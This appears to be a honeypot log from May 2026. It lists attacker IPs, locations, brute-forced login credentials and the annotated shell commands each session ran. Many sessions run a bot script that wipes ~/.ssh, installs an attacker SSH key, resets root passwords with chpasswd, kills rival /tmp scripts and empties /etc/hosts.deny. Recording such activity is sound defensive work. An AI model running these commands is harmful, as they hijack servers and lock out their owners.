$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:cl0kqWuK2Ulk"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 yankee_root_39 (43.130.33.97) β€” Santa Clara, United States Β· 1 session Β· 19 cmds
2026-05-19 14:30 EDT Β· as root/stingray
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:b2tJrPnR7w61"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 baguette (207.180.209.80) β€” Lauterbourg, France Β· 1 session Β· 1 cmd
2026-05-19 14:29 EDT Β· as jimster/1@Jimster
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 k-pop_root_18 (58.232.159.187) β€” Bupyeong-gu, South Korea Β· 1 session Β· 1 cmd
2026-05-19 14:27 EDT Β· as root/admin@2024
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 stein_3 (94.156.102.46) β€” Frankfurt am Main, Germany Β· 1 session Β· 1 cmd
2026-05-19 14:20 EDT Β· as jimster/1
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 spice_root_17 (165.232.179.250) β€” Bengaluru, India Β· 1 session Β· 1 cmd
2026-05-19 14:03 EDT Β· as root/12345678
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 wraith_root_78 (45.78.202.217) β€” Singapore, Singapore Β· 1 session Β· 19 cmds
2026-05-19 14:02 EDT Β· as claude/claude
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "claude\nJFItW6YxaLkV\nJFItW6YxaLkV"|passwd|bash
$ Enter new UNIX password:
$ echo "claude\nJFItW6YxaLkV\nJFItW6YxaLkV\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
🎭 blitz_root_14 (167.99.240.181) β€” Frankfurt am Main, Germany Β· 1 session Β· 1 cmd
2026-05-19 13:44 EDT Β· as root/!123Jimster
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 autobahn_root_16 (128.140.110.145) β€” Nuremberg, Germany Β· 1 session Β· 1 cmd
2026-05-19 13:29 EDT Β· as root/admin2026!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 yankee_2 (66.179.82.128) β€” Sulphur Springs, United States Β· 1 session Β· 1 cmd
2026-05-19 13:18 EDT Β· as jimster/1!Jimster
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 chateau_3 (157.173.121.232) β€” Lauterbourg, France Β· 1 session Β· 1 cmd
2026-05-19 13:04 EDT Β· as jimster/Jimster!123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 chai_2 (103.174.10.52) β€” SingānallΕ«r, India Β· 1 session Β· 1 cmd
2026-05-19 12:58 EDT Β· as jimster/P@ssw0rd!123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 ghost_8 (105.174.17.50) β€” Luanda, Angola Β· 1 session Β· 1 cmd
2026-05-19 12:57 EDT Β· as jimster/Jimster@2025
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 specter_root_88 (45.119.80.103) β€” QuαΊ­n Mα»™t, Vietnam Β· 1 session Β· 1 cmd
2026-05-19 12:45 EDT Β· as root/test@2026
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 phantom_7 (119.40.89.57) β€” Dhaka, Bangladesh Β· 1 session Β· 1 cmd
2026-05-19 12:29 EDT Β· as jimster/Jimster#1
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 phantom_root_93 (160.30.112.185) β€” QuαΊ­n Ba, Vietnam Β· 1 session Β· 1 cmd
2026-05-19 12:18 EDT Β· as root/Jimster2026#
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 bistro_root_13 (62.169.30.164) β€” Lauterbourg, France Β· 1 session Β· 1 cmd
2026-05-19 12:17 EDT Β· as root/admin123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 lotus_root_15 (185.100.212.141) β€” Mumbai, India Β· 1 session Β· 1 cmd
2026-05-19 12:03 EDT Β· as root/p@ssw0rd123!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 phantom_root_94 (128.199.142.124) β€” Singapore, Singapore Β· 1 session Β· 1 cmd
2026-05-19 12:01 EDT Β· as root/Password1
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 ghost_root_102 (188.0.240.22) β€” Tehran, Iran Β· 1 session Β· 1 cmd
2026-05-19 11:58 EDT Β· as admin/#123Jimster
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 burger_6 (162.241.115.151) β€” Atlanta, United States Β· 1 session Β· 1 cmd
2026-05-19 11:50 EDT Β· as jimster/jimster123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 kimchi_root_14 (112.172.142.29) β€” Jongno-gu, South Korea Β· 1 session Β· 1 cmd
2026-05-19 11:48 EDT Β· as admin/Jimster1.
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 blitz_root_15 (178.104.214.140) β€” Nuremberg, Germany Β· 1 session Β· 1 cmd
2026-05-19 11:25 EDT Β· as admin/Welcome2026
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 monsoon_root_17 (66.116.199.61) β€” Mumbai, India Β· 1 session Β· 1 cmd
2026-05-19 11:24 EDT Β· as jimster/123#Jimster
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 bear_root_4 (45.84.1.42) β€” Moscow, Russia Β· 1 session Β· 1 cmd
2026-05-19 11:01 EDT Β· as admin/Password2025
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 specter_root_89 (139.180.156.130) β€” Singapore, Singapore Β· 1 session Β· 1 cmd
2026-05-19 10:57 EDT Β· as admin/Jimster#2025
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 ghost_9 (101.100.194.252) β€” Singapore, Singapore Β· 1 session Β· 1 cmd
2026-05-19 10:56 EDT Β· as jimster/#2026Jimster
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 wraith_root_79 (31.129.22.7) β€” Viana do Castelo, Portugal Β· 4 sessions Β· 77 cmds
2026-05-13 08:54 EDT Β· as claude/Claude2026!, root/2345, root/861027
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo "root:KL9y1kMMmXUj"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—3 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo -e "Claude2026!\nF83Md5iedLLo\nF83Md5iedLLo"|passwd|bash
$ Enter new UNIX password:
$ echo "Claude2026!\nF83Md5iedLLo\nF83Md5iedLLo\n"|passwd
$ echo "root:GZdZwd65cIok"|chpasswd|bash
$ echo "root:RcbXF547mmlz"|chpasswd|bash
🎭 liberty_root_37 (209.74.71.207) β€” Los Angeles, United States Β· 3 sessions Β· 58 cmds
2026-05-19 09:51 EDT Β· as claude/Claude2026!, root/2345, root/861027
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:H6wJwQ8eE0jG"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "Claude2026!\nxWTuxY2bwdHb\nxWTuxY2bwdHb"|passwd|bash
$ Enter new UNIX password:
$ echo "Claude2026!\nxWTuxY2bwdHb\nxWTuxY2bwdHb\n"|passwd
$ echo "root:o85Whnrgm8HA"|chpasswd|bash
🎭 cipher_root_79 (43.134.22.167) β€” Singapore, Singapore Β· 1 session Β· 20 cmds
2026-05-19 09:54 EDT Β· as claude/Claude2026!
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "Claude2026!\n0Qs89sPLXY1W\n0Qs89sPLXY1W"|passwd|bash
$ Enter new UNIX password:
$ echo "Claude2026!\n0Qs89sPLXY1W\n0Qs89sPLXY1W\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 star_root_37 (43.173.86.115) β€” Santa Clara, United States Β· 1 session Β· 19 cmds
2026-05-19 09:50 EDT Β· as root/861027
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:3z1FxMQJVfGu"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 burger_root_20 (43.173.69.147) β€” Santa Clara, United States Β· 3 sessions Β· 59 cmds
2026-05-10 00:34 EDT Β· as guest/administrator123, jboss/admin123, root/123456qq@
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:FdpypvwgW9Nf"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "administrator123\ngN6t3poyQ7ob\ngN6t3poyQ7ob"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "administrator123\ngN6t3poyQ7ob\ngN6t3poyQ7ob\n"|passwd
$ echo -e "admin123\nww1ZxSUs0B63\nww1ZxSUs0B63"|passwd|bash
$ echo "admin123\nww1ZxSUs0B63\nww1ZxSUs0B63\n"|passwd
🎭 cowboy_root_46 (162.240.167.229) β€” Phoenix, United States Β· 1 session Β· 1 cmd
2026-05-19 09:11 EDT Β· as root/Jimster2026!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 eagle_root_46 (74.208.97.186) β€” Kansas City, United States Β· 1 session Β· 19 cmds
2026-05-19 08:59 EDT Β· as root/123456qq@
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:ELq6C2uoQQFn"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 eagle_root_47 (49.51.33.117) β€” Santa Clara, United States Β· 2 sessions Β· 38 cmds
2026-05-17 23:27 EDT Β· as root/1234567891, root/134679
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:lw27Q4ogAxEA"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:tiK7TRIyKc2Q"|chpasswd|bash
🎭 star_root_38 (43.135.168.114) β€” Santa Clara, United States Β· 1 session Β· 19 cmds
2026-05-19 08:06 EDT Β· as root/134679
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:173nv8DaG4az"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
